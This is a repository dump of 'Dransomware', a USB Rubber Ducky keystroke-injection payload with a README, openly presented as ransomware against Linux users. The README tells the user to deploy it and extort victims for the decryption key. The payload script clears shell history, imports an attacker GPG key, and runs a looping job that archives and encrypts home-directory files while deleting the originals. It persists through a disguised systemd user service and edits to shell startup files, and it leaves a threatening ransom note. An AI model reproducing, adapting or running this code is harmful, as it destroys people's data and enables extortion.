├── README.md
└── payload.txt


/README.md:
--------------------------------------------------------------------------------
 1 | # Dransomware
 2 | 
 3 | ## About:
 4 | * Title: Dransomware
 5 | * Description: Ransomware which encrypts users data without root privileges
 6 | * AUTHOR: drapl0n
 7 | * Version: 1.0
 8 | * Category: Ransomware
 9 | * Target: GNU/Linux
10 | * Attackmodes: HID
11 | 
12 | ## Dransomware is USB Rubber Ducky Script with ransomware which will encrypt user's data without root privileges in 30 sec's.
13 | 
14 | * Deploy Dransomware, negotiate with victim and acquire ransom in exchange of private key.
15 | * Tested on Kali linux and Parrot OS.
16 | * Only for educational purpose.
17 | ### Changes to be made:
18 | * Change Public Key in [importing gpg public key] section.
19 | * Change your key name in [dransomware] section.
20 | * Optional: You can change paths. [Be carefull while doing this].
21 | * Change your contact details in order to contact user and acquire ransom.
22 | 
23 | ### Workflow:
24 | 1. Stop storing history, this helps to keep tracks clear from begining.
25 | 2. Importing Public GPG key (this can be done by storing key on server and fetching it via wget or curl to reduce execution time).
26 | 3. Creating non-root systemd service.
27 | 4. Deploying Ransomware.
28 | 5. Autostarting service on opening terminal with shell (bash and zsh).
29 | 6. Entering Message.
30 | 
31 | #### Support me if you like my work:
32 | * https://twitter.com/drapl0n
33 | 


--------------------------------------------------------------------------------
/payload.txt:
--------------------------------------------------------------------------------
  1 | REM Title: Dransomware
  2 | REM Description: Ransomware which encrypts users data without root privileges
  3 | REM AUTHOR: drapl0n
  4 | REM Version: 1.0
  5 | REM Category: Ransomware
  6 | REM Target: GNU/Linux
  7 | REM Attackmodes: HID
  8 | 
  9 | REM [importing gpg public key]
 10 | DELAY 500
 11 | CTRL-ALT t
 12 | DELAY 1000
 13 | STRING unset HISTFILE && HISTSIZE=0 && rm -f $HISTFILE && unset HISTFILE
 14 | ENTER
 15 | DELAY 300
 16 | REM Rather than printing key you can upload your key on server and fetch it using wget or curl.
 17 | REM This method is for scenerio where their is no internet access to the system
 18 | STRING touch public.pub
 19 | ENTER
 20 | DELAY 200
 21 | STRING vi public.pub
 22 | ENTER
 23 | DELAY 50
 24 | STRING i
 25 | DELAY 200
 26 | STRING -----BEGIN PGP PUBLIC KEY BLOCK-----
 27 | ENTER
 28 | ENTER
 29 | STRING mQGNBGDn6UkBDADmUM3GGq6zlBFYq8hX78ZTZnMH8IrxYo9cr5Ni2DTyD5Ci+gPY
 30 | ENTER
 31 | STRING 2udDro6dfDy4uuKjNafPmaRf+1rvMbZYhINmnHeldV3bKskrKYL7nU29MlealK+c
 32 | ENTER
 33 | STRING hGE1AhFkJuv01eXCkJ8sLvXifzopTxWkffydEOeyrXEbIHFalmmrkYaFR9x87Rax
 34 | ENTER
 35 | STRING l7jbmPa/pd2TD5RHwsM2yZWhKHoE+0/nDIa5P5aEf6ODwqblYxPuhcDWH+1UOvDF
 36 | ENTER
 37 | STRING mDj34PoOMqhnVlUusNtD5CPCHn90KGTyAZM/GxMFIuvtoilBkw+KxPOz/xhT4sBD
 38 | ENTER
 39 | STRING K2YefqoBTRds/wB9+57eO4clL/bjUw1htJpMP7MvsqmVOa9HIXq+oJUrab8CmPmo
 40 | ENTER
 41 | STRING cjjCMbw6z/dEVI9y/BgZjDq8Z7dVUCaV/tQ0QQBzKsP7qpz78BLEpxhyU6EJNJLF
 42 | ENTER
 43 | STRING TRhwHTJWqwcQVYnh1KqXtJ68sriBEkTiKFZU7Cgr0hU2Wrs70lYDNBHTPoNd9vE1
 44 | ENTER
 45 | STRING zcTdUUPVEiWTwbsAEQEAAbQXZHJhbnMgPGRyYW5zQGRyYW5zLmNvbT6JAdQEEwEI
 46 | ENTER
 47 | STRING AD4WIQSqKkh3k7hWbZRNev2cV88R4I8DZwUCYOfpSQIbAwUJA8JnAAULCQgHAgYV
 48 | ENTER
 49 | STRING CgkICwIEFgIDAQIeAQIXgAAKCRCcV88R4I8DZ0woDADeSSYBbT3OVcm8FP6QQYRf
 50 | ENTER
 51 | STRING S2sy8cw24ziQryd6GvRb4oPumltHtfVOD9ypejy5JfNaN5oa5s82N4pRYPEUyEw/
 52 | ENTER
 53 | STRING lnTynwWMwtYw9up5aK7oemVdpana/pSDGQ6VYCGBzWW39F+1M2Uum1BbYtknzzX1
 54 | ENTER
 55 | STRING DU0tJMuGHpXMhcOpdGpjfP78LOHUg07xra9Q1REj0cnpL5wAXTwE3Oe3ZQINe8pH
 56 | ENTER
 57 | STRING EwvM/B7/EYClUf6iGOdc5EaVvaRexR5rVga9TmBJAaLDBdmk14Dx06Q9/BHQ6LRj
 58 | ENTER
 59 | STRING zNJe2yHD2zzZnL+nXM9UF/gzmkfozlbtTgarB9xCs3ZJvo0+Sfr6nOUqK8xbvtCR
 60 | ENTER
 61 | STRING ZS4IWtgppk7hjmEaJDN1lZGC3eIQJ1gVEfORYS9Myov+6Vv3WALv+FDY5hRJ+5Bz
 62 | ENTER
 63 | STRING e1g63bu4P0eKE1fk2Y64hzebXgQoL11x/uS0FpiqlW8STe0M2Mu8b7XUka/eg/zZ
 64 | ENTER
 65 | STRING AwkL/3QGFmqrIl5nMUnwPtQi6E+Pdk6/bRhOKKQeyd25AY0EYOfpSQEMAKzdbj3C
 66 | ENTER
 67 | STRING nbGIwYirjQ3mX5Wbzx2yz4vEQj1YluigyKoG/CxAYzg2FM3KYNEW7mUxSTMUornJ
 68 | ENTER
 69 | STRING YrJqw62B6icdkCY1WxxgpbEmn0jC6Srlb+0H+IKZRYwEvmlIrR5MyD6+p/av/k/Z
 70 | ENTER
 71 | STRING zXrHfcoczHzqYfwc6+tsImT+G4ktw7lMtzq6BJgZgoZOdSuBb4DWyl5vUt43QN44
 72 | ENTER
 73 | STRING RA32tp3fLsML24iFFbJEKjddrdBUjGp6+B8uj9/FkmhNhyF6D8R1/lMF0N34tNQB
 74 | ENTER
 75 | STRING ry0IV5T33zuXoWY78J48c6dVnmklMxOFr59/G7Se2UFf+3BJlhsKoebxlLuoK5vQ
 76 | ENTER
 77 | STRING kcE6eqdFuQVZGNW69okl1Mny7xqCMk1hb2Uq5odNJC8YsWgv5zAeow0IzGdtwuAs
 78 | ENTER
 79 | STRING n5JNWmmiVdi/MQGBjgwdVOq7TwrePVBIVlYESlkIkGf/855BKRHcNHwV8vuSNthB
 80 | ENTER
 81 | STRING sgfDZj3HreLnwWGJnlZfFwQM19OHjmqPP3j8paeFfmDXVVGpHvwORNY3qwARAQAB
 82 | ENTER
 83 | STRING iQG8BBgBCAAmFiEEqipId5O4Vm2UTXr9nFfPEeCPA2cFAmDn6UkCGwwFCQPCZwAA
 84 | ENTER
 85 | STRING CgkQnFfPEeCPA2cL0Av/abILLsaSl9R4jQS7BMyafUsnJ3zbUnRYF0fOYN/Bb1vR
 86 | ENTER
 87 | STRING jO7IAOqy5VLlIwYAJC2aG5hlTJ4kJvJrGXNkYEjEUWtX870HG9AHeCoOgBhQvP0q
 88 | ENTER
 89 | STRING XfUMIacEaXOz06HME2hKwG8v06YSDlD/GO3uZuzDtjAZZRvWL4yY2o6iMkAobTjj
 90 | ENTER
 91 | STRING 8T190Do8zc7+YN0ZGFbHuF1Ga2Pgg1ZldUA4Pnj/egI9skU5WIV6524hxic4z3LM
 92 | ENTER
 93 | STRING FenKCYUaxc0wJAQw6oNRtYYTeRvDKCikHKA/H9nGBcO0qjaoY3Sa96wCqXSY+ifP
 94 | ENTER
 95 | STRING xcK6snRe8z+RcTe/wADTrenSgJHSPx2OA1chSXqAUklbbDwNgu9Ldr2nAiPUA+Wn
 96 | ENTER
 97 | STRING Vq3EkSsZOiCd6YVrRUGP9Y39SPA/V4eWVox3QqJgo6sfyKb3InjVRCgJk9GnAquP
 98 | ENTER
 99 | STRING e+u4UkVpwfYhldbd3WwTSgzd7xqkym4QIsrds5q8NtWWj+kHo9LdVZ6hl11T83aO
100 | ENTER
101 | STRING Rd+dmVLPeNF6XJ60hm6n
102 | ENTER
103 | STRING =h69d
104 | ENTER
105 | STRING -----END PGP PUBLIC KEY BLOCK-----
106 | ESC
107 | DELAY 300 
108 | STRING :wq
109 | ENTER
110 | DELAY 300
111 | STRING gpg --import public.pub && rm -rf public.pub
112 | ENTER
113 | 
114 | 
115 | REM [Creating systemd service for non-root user]
116 | DELAY 200
117 | REM This is the path where encrypted directories will be stored
118 | STRING mkdir ~/.ransom
119 | ENTER
120 | DELAY 100
121 | STRING mkdir -p ~/.config/systemd/user && touch ~/.config/systemd/user/libSystemIO.service
122 | ENTER
123 | DELAY 200
124 | ENTER
125 | STRING cat >> ~/.config/systemd/user/libSystemIO.service
126 | DELAY 200
127 | ENTER
128 | DELAY 50
129 | STRING [Unit]
130 | ENTER
131 | REM You can change description
132 | REM You can change service description
133 | STRING Description = Ransom
134 | ENTER
135 | ENTER
136 | STRING [Service]
137 | ENTER
138 | CTRL d
139 | STRING echo ExecStart=/bin/bash /home/$(whoami)/.system/drans -no-browser >> ~/.config/systemd/user/libSystemIO.service
140 | ENTER
141 | STRING cat >> ~/.config/systemd/user/libSystemIO.service
142 | ENTER
143 | STRING Restart=on-failure
144 | ENTER
145 | STRING SuccessExitStatus=3 4
146 | ENTER
147 | STRING RestartForceExitStatus=3 4
148 | ENTER
149 | ENTER
150 | STRING [Install]
151 | ENTER
152 | STRING WantedBy=default.target
153 | ENTER
154 | CTRL d
155 | ENTER
156 | 
157 | REM [dransomware]
158 | DELAY 500
159 | STRING mkdir ~/.system && touch ~/.system/drans && vi ~/.system/drans
160 | ENTER
161 | STRING i
162 | DELAY 200
163 | STRING #!/bin/sh
164 | ENTER
165 | STRING cd ~/
166 | ENTER
167 | STRING encrypt(){                                                                                                     
168 | ENTER
169 | STRING          dirFile=$(ls | head -n 1)
170 | ENTER
171 | STRING          tar cf ~/.ransom/$dirFile.tar.gz --exclude='.' --exclude='..' --exclude='.ransom' --remove-files $dirFile
172 | ENTER
173 | REM replace drans with name of your key
174 | STRING          gpg -e -r drans -o ~/.ransom/$dirFile.tar.gpg ~/.ransom/$dirFile.tar.gz && rm -rf ~/.ransom/$dirFile.tar.gz 
175 | ENTER
176 | STRING }
177 | ENTER
178 | STRING for (( ; ; ))
179 | ENTER
180 | STRING do
181 | ENTER
182 | STRING        encrypt
183 | ENTER
184 | STRING done
185 | DELAY 100
186 | ESC
187 | STRING :wq
188 | ENTER
189 | DELAY 100
190 | STRING chmod +x ~/.system/drans
191 | ENTER
192 | DELAY 100
193 | REM change drans to name of your key
194 | STRING gpg --edit-key drans
195 | ENTER
196 | DELAY 100
197 | STRING trust
198 | ENTER
199 | DELAY 100
200 | STRING 5
201 | ENTER 
202 | DELAY 50
203 | STRING y
204 | ENTER
205 | CTRL c
206 | DELAY 100
207 | STRING gpg --check-trustdb
208 | ENTER
209 | STRING gpg --update-trustdb
210 | ENTER
211 | DELAY 100
212 | STRING systemctl --user enable --now libSystemIO.service
213 | ENTER
214 | DELAY 100
215 | STRING systemctl --user start libSystemIO.service
216 | ENTER
217 | DELAY 100
218 | DELAY 50
219 | 
220 | REM [autostart on opening terminal]
221 | STRING echo systemctl --user enable --now libSystemIO.service >> ~/.zshrc
222 | ENTER
223 | DELAY 50
224 | STRING echo systemctl --user enable --now libSystemIO.service >> ~/.bashrc
225 | ENTER
226 | 
227 | REM [Message]
228 | REM change message, to acquire ransom
229 | STRING mkdir ~/.hacker/ && touch ~/.hacker/README.txt
230 | ENTER
231 | DELAY 100
232 | STRING echo I'm Hacker Don't try to ShutDown your system this will permanantly delete your data, contact test@test.com for further details... >> ~/.hacker/README.txt
233 | ENTER
234 | DELAY 50
235 | STRING exit
236 | ENTER
237 | 


--------------------------------------------------------------------------------